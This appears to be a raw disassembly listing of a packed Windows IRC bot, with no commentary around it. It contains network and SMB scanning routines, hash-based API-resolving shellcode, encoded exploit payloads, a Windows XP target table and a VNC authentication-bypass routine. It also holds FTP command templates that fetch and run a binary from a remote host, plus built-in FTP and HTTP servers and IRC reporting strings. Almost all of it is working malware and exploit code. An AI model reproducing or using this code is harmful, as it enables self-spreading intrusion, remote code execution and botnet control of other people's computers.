unk_4322AC db 2Dh ; - ; DATA XREF: sub_40C669+41�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSPor db 'Scanning IP: %s, Port: %d.',0
align 4
unk_4322D4 db 2Dh ; - ; DATA XREF: sub_40C75A+D1�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedScanni db 'Finished scanning IP: %s.',0
align 10h
unk_432300 db 2Dh ; - ; DATA XREF: sub_40C75A+41�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSP_0 db 'Scanning IP: %s, Port: %d.',0
align 4
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_40CADB+B2�o
align 4
dword_432338 dd 10FF8h, 0 ; DATA XREF: sub_40CADB+6A�o
dword_432340 dd 10FF8h ; DATA XREF: sub_40CADB+79�o
dword_432344 dd 7FFDF020h, 0 ; DATA XREF: sub_40CADB+162�o
dword_43234C dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_40CF05+7B�o
dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_4323D4 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_40CF05+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_432404 dd 0 ; DATA XREF: sub_40CF05+44�o
dd 800000D4h, 0
unk_432410 db 81h ; ; DATA XREF: sub_40CFDF+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
byte_43245C db 41h ; DATA XREF: sub_40D07D+107�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
; =============== S U B R O U T I N E =======================================
sub_4324A0 proc near ; DATA XREF: UPX0:0040D35C�o
push ebx
push esi
push edi
sub sp, 80h
mov esi, esp
call sub_43259C
push dword ptr [esi]
push 63D61209h
call sub_4325B2
mov [esi+8], eax
call sub_432565
push dword ptr [esi+4]
push 0CA2BD06Bh
call sub_4325B2
mov [esi+0Ch], eax
call sub_432517
push dword ptr [esi+4]
push 4C0297FAh
call sub_4325B2
xor ebx, ebx
push 410h
push ebx
call eax
mov ebx, eax
push esi
mov esi, [esi+10h]
mov edi, eax
mov ecx, 410h
rep movsb
pop esi
xor eax, eax
push eax
push eax
push eax
push ebx
push eax
push eax
call dword ptr [esi+0Ch]
mov eax, [esi+8]
add sp, 80h
pop edi
pop esi
pop ebx
jmp eax
sub_4324A0 endp
; =============== S U B R O U T I N E =======================================
sub_432517 proc near ; CODE XREF: sub_4324A0+33�p
var_20 = dword ptr -20h
var_14 = dword ptr -14h
pusha
call sub_432540
mov eax, [esp+20h+var_14]
lea ebx, [eax+7Ch]
add dword ptr [ebx+3Ch], 5
add dword ptr [ebx+28h], 1000h
and dword ptr [ebx+28h], 0FFFFF000h
mov eax, [esp+20h+var_20]
add esp, 14h
push eax
xor eax, eax
retn
sub_432517 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_432540 proc near ; CODE XREF: sub_432517+1�p
xor edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
xor ebx, ebx
mov eax, 42904290h
loc_43254F: ; CODE XREF: sub_432540+1A�j
xor ecx, ecx
mov cl, 2
mov edi, ebx
repe scasd
jz short loc_43255C
inc ebx
jmp short loc_43254F
; ---------------------------------------------------------------------------
loc_43255C: ; CODE XREF: sub_432540+17�j
mov [esi+10h], edi
pop dword ptr fs:[edx]
pop eax
popa
retn
sub_432540 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_432565 proc near ; CODE XREF: sub_4324A0+1E�p
pusha
mov edi, 7FFDF020h
mov ebx, [edi]
mov eax, [esi+8]
mov [edi], eax
mov edi, [edi-8]
add edi, 178h
mov ecx, edi
loc_43257D: ; CODE XREF: sub_432565+1E�j
cmp [ecx], ebx
jz short loc_432585
mov ecx, [ecx]
jmp short loc_43257D
; ---------------------------------------------------------------------------
loc_432585: ; CODE XREF: sub_432565+1A�j
mov edx, edi
loc_432587: ; CODE XREF: sub_432565+2A�j
cmp [edx+4], ebx
jz short loc_432591
mov edx, [edx+4]
jmp short loc_432587
; ---------------------------------------------------------------------------
loc_432591: ; CODE XREF: sub_432565+25�j
mov [ecx], edx
mov [edx+4], ecx
mov byte ptr [ebx-3], 1
popa
retn
sub_432565 endp
; =============== S U B R O U T I N E =======================================
sub_43259C proc near ; CODE XREF: sub_4324A0+A�p
mov eax, ds:7FFDF00Ch
mov eax, [eax+1Ch]
mov ebx, [eax+8]
mov [esi], ebx
mov eax, [eax]
mov eax, [eax+8]
mov [esi+4], eax
retn
sub_43259C endp
; =============== S U B R O U T I N E =======================================
sub_4325B2 proc near ; CODE XREF: sub_4324A0+16�p
; sub_4324A0+2B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebp, [esp+20h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_4325C8: ; CODE XREF: sub_4325B2+33�j
jecxz short loc_432602
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
xor eax, eax
cld
loc_4325D5: ; CODE XREF: sub_4325B2+2D�j
lodsb
cmp al, ah
jz short loc_4325E1
ror edi, 0Dh
add edi, eax
jmp short loc_4325D5
; ---------------------------------------------------------------------------
loc_4325E1: ; CODE XREF: sub_4325B2+26�j
cmp edi, [esp+20h+arg_0]
jnz short loc_4325C8
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
mov [esp+20h+var_4], eax
popa
retn 8
; ---------------------------------------------------------------------------
loc_432602: ; CODE XREF: sub_4325B2:loc_4325C8�j
; sub_4325B2:loc_432602�j
jmp short loc_432602
sub_4325B2 endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
sub_432608 proc near ; DATA XREF: UPX0:0040D30A�o
arg_0 = dword ptr 4
add esp, 0FFFFF254h
cld
call sub_43265A
mov eax, [ebp+3Ch]
mov edi, [ebp+eax+78h]
add edi, ebp
mov ecx, [edi+18h]
mov ebx, [edi+20h]
add ebx, ebp
loc_432625: ; CODE XREF: sub_432608+38�j
jecxz short loc_432655
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor eax, eax
cdq
loc_432630: ; CODE XREF: sub_432608+32�j
lodsb
test al, al
jz short loc_43263C
ror edx, 0Dh
add edx, eax
jmp short loc_432630
; ---------------------------------------------------------------------------
loc_43263C: ; CODE XREF: sub_432608+2B�j
cmp edx, [esp+arg_0]
jnz short loc_432625
mov ebx, [edi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edi+1Ch]
add ebx, ebp
mov ebx, [ebx+ecx*4]
add ebx, ebp
loc_432655: ; CODE XREF: sub_432608:loc_432625�j
mov [esp+arg_0], ebx
retn
sub_432608 endp
; =============== S U B R O U T I N E =======================================
sub_43265A proc near ; CODE XREF: sub_432608+7�p
; FUNCTION CHUNK AT 00432692 SIZE 00000008 BYTES
xor eax, eax
mov eax, fs:[eax+30h]
test eax, eax
js short loc_432673
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
jmp loc_43267E
; ---------------------------------------------------------------------------
loc_432673: ; CODE XREF: sub_43265A+8�j
mov eax, [eax+34h]
add eax, 7Ch
mov ebp, [eax+3Ch]
loc_43267E: ; CODE XREF: sub_43265A+14�j
pop edi
xor esi, esi
pusha
push esi
jmp short loc_432692
sub_43265A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_432685 proc near ; CODE XREF: sub_43265A:loc_432692�p
push 60E0CEEFh
push 0E8AFE98h
push edi
jmp edi
sub_432685 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43265A
loc_432692: ; CODE XREF: sub_43265A+29�j
call sub_432685
loc_432697: ; DATA XREF: sub_40CADB+320�o
add [eax+0], ah
; END OF FUNCTION CHUNK FOR sub_43265A
; ---------------------------------------------------------------------------
dw 0
dword_43269C dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_40CADB+2F5�o
dword_4326A8 dd 30h ; DATA XREF: sub_40CADB+2CA�o
dword_4326AC dd 0A1h ; DATA XREF: sub_40CADB+29F�o
dword_4326B0 dd 3 ; DATA XREF: sub_40CADB+246�o
aCccc db 'CCCC',0 ; DATA XREF: sub_40CADB+153�o
align 4
loc_4326BC: ; DATA XREF: sub_40CADB+E8�o
jmp short near ptr dword_4326C4
; ---------------------------------------------------------------------------
db 6 dup(90h)
dword_4326C4 dd 0 ; CODE XREF: UPX0:loc_4326BC�j
aCmdCEchoOpenSD db 'cmd /c echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &'
; DATA XREF: UPX0:0040D331�o
db 'echo quit >> o &ftp -n -s:o &%s',0Dh,0Ah,0
align 10h
dword_432730 dd 0E983C933h, 0D9EED9AFh, 5BF42474h ; DATA XREF: sub_40D99C+2B0�o
; ---------------------------------------------------------------------------
loc_43273C: ; CODE XREF: UPX0:00432746�j
xor dword ptr [ebx+13h], 6AD31EBBh
sub ebx, 0FFFFFFFCh
loop loc_43273C
inc edi
jz short loc_432783
and eax, 952CE753h
inc esp
jle short loc_4327AB
push es
lahf
cmp bl, [eax+2Fh]
xchg edx, [ebp+1FC36FAFh]
cmp al, 0E1h
; ---------------------------------------------------------------------------
dd 355806F4h, 89381F9Bh, 5E58578Bh, 5B3D1F30h, 0EE7F877Bh
dd 0ABD46A7Bh, 0A8D21371h, 3EE8EA50h
; ---------------------------------------------------------------------------
lahf
cmps byte ptr ss:[esi], byte ptr es:[edi]
loc_432783: ; CODE XREF: UPX0:00432749�j
mov [eax], esi
inc ecx
imul dword ptr [ebx+50h]
js short near ptr loc_4327E2+1
lock xchg ax, bp
; ---------------------------------------------------------------------------
dw 768Ch
dd 46D0F5BAh, 4EBF9730h, 5B107FA7h, 2A587A7Bh, 6693958Bh
dd 0C7CF6E30h
; ---------------------------------------------------------------------------
loc_4327A8: ; CODE XREF: UPX0:004327D5�j
xor [esi-25h], bl
loc_4327AB: ; CODE XREF: UPX0:00432751�j
xor al, 0D3h
nop
popf
db 64h
push edi
dec esi
sub al, 0BCh
mov al, ch
mov ch, 39h
fnsave byte ptr [esi-20h]
pop eax
shr dword ptr [ecx-60h], cl
pop eax
in al, 4Ah
sub al, 0BAh
loc_4327C4: ; CODE XREF: UPX0:004327F7�j
rcl ebp, cl
db 3Eh
xchg eax, esi
or byte ptr [esi+2Ch], 0BCh
in al, 97h
db 36h
or al, 3Ah
rep fld tbyte ptr [eax-12h]
jz short loc_4327A8
xchg eax, ebp
imul esi, [esi+0Ah], 63h
dec esi
mov bl, 84h
xchg eax, ebp
insd
dec ebp
loc_4327E2: ; CODE XREF: UPX0:00432789�j
cmp byte ptr [ecx], 0E8h
dec ebp
nop
cmp eax, edi
dec ebp
sub al, 0BAh
fnsave byte ptr [esi-2Dh]
paddusw mm1, qword ptr [ebp+5Ah]
mov ebp, [esi]
jbe short loc_43286E
jo short loc_4327C4
fld dword ptr [ebp+edx*4+3BC3746Dh]
out dx, al
loope near ptr loc_432805+1
add bl, [edi]
loc_432805: ; CODE XREF: UPX0:00432801�j
mov bl, 0FDh
sub esp, 0FFFFFFE1h
add eax, 3E1EE39h
add bl, [esi+57h]
push ebp
and ebp, esp
loope near ptr loc_43281A+2
cmp ch, bh
dec edx
loc_43281A: ; CODE XREF: UPX0:00432815�j
xchg dl, [ebp-72447295h]
retn 0AAD8h
; ---------------------------------------------------------------------------
db 3Dh
dd 9586C844h, 0EB9786Bh, 7B076DDh, 3AB9FB32h, 0E31F37E2h
dd 0E397745Ch, 99132F59h, 4791E011h, 0F9FF5C45h, 0C1EB6436h
dd 18BBB510h, 95C5AD45h, 0BC2C5ACEh, 3B8149E0h, 6BB94FEAh
dd 3B864FEAh, 0C7BBCE44h, 391D1B62h
db 44h, 0C8h
; ---------------------------------------------------------------------------
loc_43286E: ; CODE XREF: UPX0:004327F5�j
mov ecx, 2C294495h
mov edx, 0E92F4930h
jg short loc_4328F4
sub al, 0BCh
jmp near ptr 54452C62h
; ---------------------------------------------------------------------------
db 0D0h, 33h, 0Ah
dd 9505E1E8h, 6AD31E6Bh, 0
dword_432890 dd 0EFFFC481h, 44FFFFh, 4328DCh ; DATA XREF: sub_40D99C+297�o
dword_43289C dd 42Ah ; DATA XREF: sub_40D99C+24A�r
dword_4328A0 dd 3E8h ; DATA XREF: sub_40D99C+2BB�r
dword_4328A4 dd 258h ; DATA XREF: sub_40D99C+28D�r
byte_4328A8 db 1 ; DATA XREF: sub_40D99C+1F6�r
; sub_40D99C+2C4�r
align 4
dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)"
dd 2C6h, 264h, 0
dd 1
dword_4328C0 dd 20804h ; DATA XREF: sub_40D8A0�r
; sub_40D99C+2E2�o ...
aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: UPX0:004328AC�o
align 4
dd 646E6957h, 2073776Fh, 2C34544Eh, 30303220h, 53282030h
dd 532D3050h
; ---------------------------------------------------------------------------
loc_4328F4: ; CODE XREF: UPX0:00432878�j
push eax
xor al, 29h
loc_4328F7: ; DATA XREF: sub_40D99C+21E�o
add bl, ch
add al, [eax]
; ---------------------------------------------------------------------------
db 0
align 10h
dword_432900 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; DATA XREF: sub_40D99C+14E�o
dword_432914 dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_40D99C+F2�o
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_40D99C+81�o
align 4
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40D99C+33�o
align 4
aCmdCEchoOpen_0 db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: sub_40DEA1+92�o
; sub_40DFE3+92�o
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
dword_4329BC dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_40E0D1+5A�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh dup(64646464h)
dd 1016464h, 40h dup(65656565h), 66010165h, 40h dup(66666666h)
dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h
dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h
dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh
dd 6C6C6C01h, 8 dup(6C6C6C6Ch), 41416C6Ch, 100D06EBh, 6D6D501Eh
dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h
dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh
dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h
dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h, 0AF5B8DF3h
dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh
dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h
dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h
dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h, 85773449h
dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh, 0D43C8A9Bh
dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh, 78281EB8h
dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh
dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h
dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h
dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h, 2C47A345h
dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h
dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h
dd 4838E43h, 5180BD0Ch, 0EFAF269Ah, 0D87B5338h, 78A9269Bh
dd 877FD918h
aMmmmmmmmmmmmmm db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
align 10h
aVncD_DSSAuthby db 'VNC%d.%d %s: %s - [AuthBypass]',0 ; DATA XREF: UPX0:0040E40D�o
align 10h
aRfb03d_03d db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: UPX0:0040E29A�o
align 10h
word_433C00 dw 1 ; DATA XREF: UPX0:0040E211�r
align 4
dword_433C04 dd 2E646D63h, 657865h ; DATA XREF: sub_40E504+130�o
; sub_419C65+21�o
aEchoOpenSDOEch db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o'
; DATA XREF: sub_40E6F0+23E�o
db ' &echo bye >>o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_40E992+5F2�o
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_40E992+5D1�o
align 4
aFtpTransferCom db 'ftp transfer complete to: %s',0 ; DATA XREF: sub_40E992+580�o
align 4
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_40E992+56C�o
aFtpTransferSta db 'ftp transfer started to: %s',0 ; DATA XREF: sub_40E992+522�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_40E992+4F7�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_40E992+4DF�o
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_40E992+4CF�o
align 4
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_40E992+4BE�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_40E992+48B�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_40E992+447�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_40E992+40E�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_40E992+3E0�o
align 10h
aList_0 db 'LIST',0 ; DATA XREF: sub_40E992+3CD�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_40E992+395�o
align 4
aPasv db 'PASV',0 ; DATA XREF: sub_40E992+382�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_40E992+372�o
aI_0: ; DATA XREF: sub_40E992+35E�o
; UPX0:00438368�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_40E992+33B�o
aA_0: ; DATA XREF: sub_40E992+327�o
; UPX0:00438374�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_40E992:loc_40EC9B�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_40E992+2FE�o
align 4
off_433E54 dd offset dword_445750 ; DATA XREF: sub_40E992+2EA�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_40E992+2DD�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_40E992+2C9�o
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_40E992+2BC�o
align 4
aSyst db 'SYST',0 ; DATA XREF: sub_40E992+2A8�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_40E992+29B�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_40E992+287�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_40E992+277�o
align 4
aUser_1 db 'USER',0 ; DATA XREF: sub_40E992+262�o
align 4
aSS_0 db '%s %s',0 ; DATA XREF: sub_40E992+251�o
align 4
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_40E992+1C9�o
align 4
unk_433EEC db 2Dh ; - ; DATA XREF: sub_40F0D6+3F8�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerFailedRe db ' server failed, returned %d',0
asc_433F14 db 0Dh,0Ah,0 ; DATA XREF: sub_40F0D6+2CF�o
; sub_41A4D2+F5�o
align 4
aGet_0 db 'GET ',0 ; DATA XREF: sub_40F0D6+269�o
align 10h
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40F531+F7�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40F531+D4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_40F531+98�o
; sub_41AA43+1AE�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_40F531+84�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_40F531:loc_40F597�o
align 4
aTextHtml db 'text/html',0 ; DATA XREF: sub_40F531+5F�o
align 4
unk_434134 db 2Dh ; - ; DATA XREF: sub_40F6B4+296�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_37 db ' failed to start worker thread, error %d',0
align 4
unk_43416C db 2Dh ; - ; DATA XREF: sub_40F6B4+212�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aWorkerThreadOf db ' worker thread of server thread: %d.',0
align 10h
asc_4341A0: ; DATA XREF: sub_40F6B4+15A�o
unicode 0, <*>,0
aS_3 db '\%s',0 ; DATA XREF: sub_40F6B4+2F�o
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_40F96B+652�o
align 10h
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_40F96B+637�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_40F96B+61C�o
align 4
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_40F96B+58D�o
align 4
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_40F96B+571�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_40F96B:loc_40FE93�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_40F96B+521�o
align 4
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_40F96B+46E�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_40F96B+42F�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_40F96B+3F9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_40F96B:loc_40FD25�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_40F96B+3B3�o
align 4
aSS_1 db '%s%s/',0 ; DATA XREF: sub_40F96B+36C�o
align 4
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_40F96B+328�o
; sub_40F96B+496�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_40F96B+310�o
align 10h
aS_0 db '<%s>',0 ; DATA XREF: sub_40F96B+2E9�o
; sub_40F96B+40B�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_40F96B+2BF�o
aAm db 'AM',0 ; DATA XREF: sub_40F96B+295�o
align 4
